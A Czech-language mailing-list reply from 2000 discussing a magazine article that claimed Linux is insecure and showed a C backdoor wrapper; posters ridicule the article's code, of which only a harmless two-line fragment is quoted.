Bezpecnost Linuxu

Ondrej Sury ondrej na globe.cz
Pondělí Květen 29 14:08:25 CEST 2000

uhlar na fantomas.sk wrote:

> Jan Kasprzak <kas na informatics.muni.cz> wrote:
> ->      Pan Janda dnes zveřejnil na Neviditelném Psu další článek,
> -> který má dokázat, jak je Linux nebezpečný. Odvozuje to z toho,
> -> že k Linuxu jsou dostupné zdrojové texty. Autor ukazuje, jak si vytvoří
> -> pomocí krátkého wrapperu v jazyce C zadní vrátka (backdoor) do systému,
> -> je-li superuživatelem.
>
> Kazdy kto sa len trosku vyzna v C pri pohlade na ten zdrojak asi odpadne...

> main(argc, argv)
>         int argc;
> [...]

No ja si z myslim, ze schvalne pise blaboly, protoze se mi zda, ze
tomu tak nejak rozumi.  (Teda pokud tenhle zdrojak neni vyhrabany
z nejake konference, o cemz pochybuji, protoze tohle se neda
napsat neumyslne.)

--
Ondrej Sury <ondrej na sury.cz> Globe Internet s.r.o. http://globe.cz/
Tel: +420235365000 Fax: +420235365009  Planickova 1, 162 00 Praha 6